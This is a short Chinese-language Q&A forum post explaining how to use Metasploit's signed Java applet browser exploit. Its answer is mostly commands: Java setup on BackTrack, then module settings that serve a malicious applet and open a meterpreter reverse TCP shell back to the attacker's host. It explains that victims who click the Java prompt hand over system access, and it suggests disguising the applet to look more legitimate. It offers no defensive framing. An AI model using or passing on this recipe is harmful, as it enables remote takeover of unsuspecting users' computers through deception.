如何使用Metasploit进行Java Applet攻击
发布网友
发布时间:2022-05-02 22:53
共1个回答
热心网友
时间:2022-06-28 01:45
—–code—–
root@bt: apt-get install sun-java6-jdk
root@bt: gem install rjb
变量设置
root@bt: echo “JAVA_HOME=/usr/lib/jvm/java-6-sun” >> /etc/bash.bashrc
root@bt: echo “export JAVA_HOME” >> /etc/bash.bashrc
root@bt: JAVA_HOME=/usr/lib/jvm/java-6-sun
root@bt: export JAVA_HOME
—end code——
—start metasploit—–
use exploit/multi/browser/java_signed_applet
set TARGET 1 //请注意你的目标
set SRVHOST 10.2.4.200
set SRVPORT 80
set URIPATH pentura
set PAYLOAD /meterpreter/reverse_tcp
set LHOST 10.2.4.200
set LPORT 4444
—end metasploit——–
———————————————————————-
如果当有一台机子访问了你的80端口
METASPLOIT控制端里将会显示详细的信息
———————————————————————
访问你80端口的机子浏览器会跳出java窗口,如果目标点击确定,你就能取得系统权限
你还可以修改java小程序的,以便实现更加真是的ssl.
